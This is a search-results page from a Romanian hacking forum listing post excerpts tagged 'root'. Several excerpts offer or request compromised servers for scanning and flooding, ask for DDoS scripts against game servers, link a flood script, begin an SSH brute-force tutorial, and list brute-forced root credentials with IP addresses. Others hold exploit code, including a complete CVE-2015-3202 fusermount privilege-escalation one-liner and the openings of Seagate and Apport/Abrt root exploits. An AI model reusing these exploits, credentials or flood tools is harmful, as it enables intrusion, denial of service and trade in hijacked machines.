Jump to content

Search the Community

Showing results for tags 'root'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. Toti cauta sa sparga rooturi sau alte servici de care pot profita in mediul online..Un exemplu de "munca" ar fi: De ce avem nevoie: -1- bucata scanner ssh -2- bucata brute force ssh -3- 2 in 1 .... Avem nevoie de scannerul: unixcod Descarcam scannerul:2shared - download unixcod.tar.gz PS : tool-ul folosit este unul destul de comod care se descurca destul de bine , dar totusi , daca vrei sa furi ceva bun ai nevoie de ceva pe masura. Deschidem consola.. Folosim comanda de extragere: sudo tar -zxvf <sursa fisier> Fisierul este extras..acum frumos selectam din consola calea catre folde
  2. Salutare oameni buni am telefon Allview a5 ready si am nevoie de un backup stock rom pentru a-mi reface telefonul cu sp flashtool cine are acest telefon va rog sa ma ajutati cu un link de download.Ajutati-ma sa imi refac telefonul...VA ROG.
  3. La intrebarea "de ce da Google vps gratuit?" raspunsul e: are bani de la Apple ========================= Alphabet's Google has quietly scored a major coup in its campaign to become an enterprise cloud computing powerhouse, landing Apple as a customer for the Google Cloud Platform, multiple sources with knowledge of the matter told CRN this week. Since inking the Google deal late last year, Apple has also significantly reduced its reliance on Amazon Web Services, whose infrastructure it uses to run parts of iCloud and other services, said the sources, who all re
  4. Salut RST Am nevoie de un program sau un script in root pentru a da flood serverelor de Metin2, am incercat udp.pl pe root dar nimic nu am reusit. Va rog fara glume sau mistouri, daca ma puteti ajuta bine daca nu nu, nu vreau comentarii inutile
  5. caut root eth0 eth1 pt scanat contracost.ms
  6. Ma poate ajuta si pe mine cineva cu un tutorial de root xperia z3 compact ... cei de la XDA spun ca dupa root se duce aplicatia de camera :S oare asa e
  7. #!/usr/bin/python # seagate_ftp_remote_root.py # # Seagate Central Remote Root Exploit # # Jeremy Brown [jbrown3264/gmail] # May 2015 # # -Synopsis- # # Seagate Central by default has a passwordless root account (and no option to change it). # One way to exploit this is to log into it's ftp server and upload a php shell to the webroot. # From there, we can execute commands with root privileges as lighttpd is also running as root. # # -Fixes- # # Seagate scheduled it's updates to go live on April 28th, 2015. # # Tested Firmware Version: 2014.0410.0026-F # import sys from ftplib import FTP por
  8. Hello, During a recent assessment I have stumbled across a system which had hwclock(8) setuid root hwclock is a part of util-linux, all versions affected $ man hwclock | sed -n '223,231p' Users access and setuid Sometimes, you need to install hwclock setuid root. If you want users other than the superuser to be able to display the clock value using the direct ISA I/O method, install it setuid root. If you have the /dev/rtc interface on your system or are on a non-ISA system, there's probably no need for users to use the direct ISA I/O method, so don't bother.
  9. # Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet. 12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890 a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202 # Here's how it works, $a holds the name of a shellscript to be executed as # root. a=/tmp/.$$; # $b is used twice, first to build the contents of shellscript $a, and then as # a command to make $a executable. Quotes are unused to save a charac
  10. Salutare RST, Cum spune si titlu.. Cumpar un root.. Vreau oameni seriosi... Reply/pm P.S : Ma scuzati daca am greit categoria..
  11. RooT Flood + PERL 1. vps Ukrainian data center. VPS Hosting. 2. 10 minute 10 Minute Mail 2. perl esl.pl http://andreyesl.16mb.com/esl.pl Like and subscribe ! THANKS!!! https://www.youtube.com/watch?v=AFmPVdAB4kY
  12. RooT Flood 100% Free Linux https://www.youtube.com/watch?v=AFmPVdAB4kY
  13. [CVE-2015-1318,CVE-2015-1862] Apport/Abrt Local Root Exploit #define _GNU_SOURCE #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <fcntl.h> #include <signal.h> #include <elf.h> #include <err.h> #include <syslog.h> #include <sched.h> #include <linux/sched.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/auxv.h> #include <sys/wait.h> # warning this file must be compiled with -static // // Apport/Abrt Vulnerability Demo Exploit. // // Apport: CVE-2015-1318 // Abrt: CVE-2015
  14. Care ma poate ajuta cu un ROOT nu conteaza , multumesc .
  15. Am si eu un desire 500 si nu ii pot face root, am inteles ca trebuie sa ii instalez prima orara CMW recovery...si nu prea stiu cum ,am cautat pe la tutoriale de mi-a venit rau ,multe in engleza , un pic de ajutor ?
  16. Fisierul de configurare al SSH se afla il gasiti aici /etc/ssh/sshd_config. 1. Creare user de login. Se creaza un user pe server folosind litere mari, mici si numere pentru evitarea dictionarelor si o parola cat mai complexa. Exemplu eT40Pkh2. Acestui user nu i se vor da drepturi pe server. 2. Dezactivare root login. Se cauta parametrul PermitRootLogin. Daca e comentat, se decomenteaza sau daca lipseste se adauga si se se seteaza no: PermitRootLogin no 3. Se activeaza AllowUsers Acest parametru permite logarea prin SSH doar userilor care sunt trecuti in acest parametru. Se cauta parametrul A
  17. setroubleshoot tries to find out which rpm a particular file belongs to when it finds SELinux access violation reports. The idea is probably to have convenient reports for the admin which type enforcement rules have to be relaxed. setroubleshoot runs as root (although in its own domain). In util.py we have: 266 def get_rpm_nvr_by_file_path_temporary(name): 267 if name is None or not os.path.exists(name): 268 return None 269 270 nvr = None 271 try: 272 import commands 273 rc, output = commands.getstatusoutput("rpm -qf '%s'" % name) 274 if rc == 0: 2
  18. Am un root, ce pot face cu el? Cum il pot face root de scan sau de flood?
  19. SirAlx

    SSH V2!

    Greets to: Molo !!! & Hater for supporting free shares! Pls, lasati-mi thread-ul cu invidia voastra, eu dau free, majoritatea cer bani pe ce postez, RST hope you enjoy. Netestate ! L-amPrins... !! -><!--:member1 server //-->:191.103.115.27 root@kali:~/gblscanner# L-amPrins... !! ->admin:admin:190.16.178.227 DUP L-amPrins... !! ->root:root:191.103.115.27 L-amPrins... !! ->oracle:oracle:191.33.168.143 DUP L-amPrins... !! ->admin:admin123:190.16.178.227 L-amPrins... !! ->root:r00t123:67.49.161.163 L-amPrins... !! ->root:r00t123:67.49.167.41 L-amPrins... !! ->root
  20. 1K Like 10$ Root 6$ /b Pentru mai multe informati , ma puteti contacta in PM sau pe YM si ICQ ! BTC/PM/WMZ
  21. Rog frumos cine imi da si mie un root ?
  22. MULTIPLE VULNERABILITIES WITH KGUARD DIGITAL VIDEO RECORDERS, February 10, 2015 PRODUCT DESCRIPTION The Kguard SHA104 & SHA108 are 4ch/8ch H.264 DVRs designed for economical application. It's stylish & streamlines hardware design and excellent performance can be fast moving, competitive and an ideal solution for entry level & distribution channels. VENDOR REFERENCE: http://us.kworld-global.com/main/prod_in.aspx?mnuid=1306&modid=10&prodid=527 VULNERABILITY DESCRIPTION 1. Insufficient authentication and authorization A deficiency in handling authentication and aut
  23. Mai vinde cineva root de scan? Nu root care pica dupa 2 ore de scan! Daca mai are cineva astept pm
  24. Guest

    Ajutor Root

    Buna seara. Vreau sa imi cumpar un root si din cate am inteles imi trebuie un sniff de unde pot face rost de el etc. care ma poate ajuta sa imi lase in PM un id mess/skype va rog frumos ps: sunt incepator si as vrea sa invat va rog nu injurati si chesti din astea. Multumesc
  25. Salut, as dori si eu un root de scan,curat (fara alte lucruri adaugate, gen drop, redirect si etc) as putea sa dau la schimb cont filelist, czteam, scenefz cu ratie buna; Multumesc anticipat
×
×
  • Create New...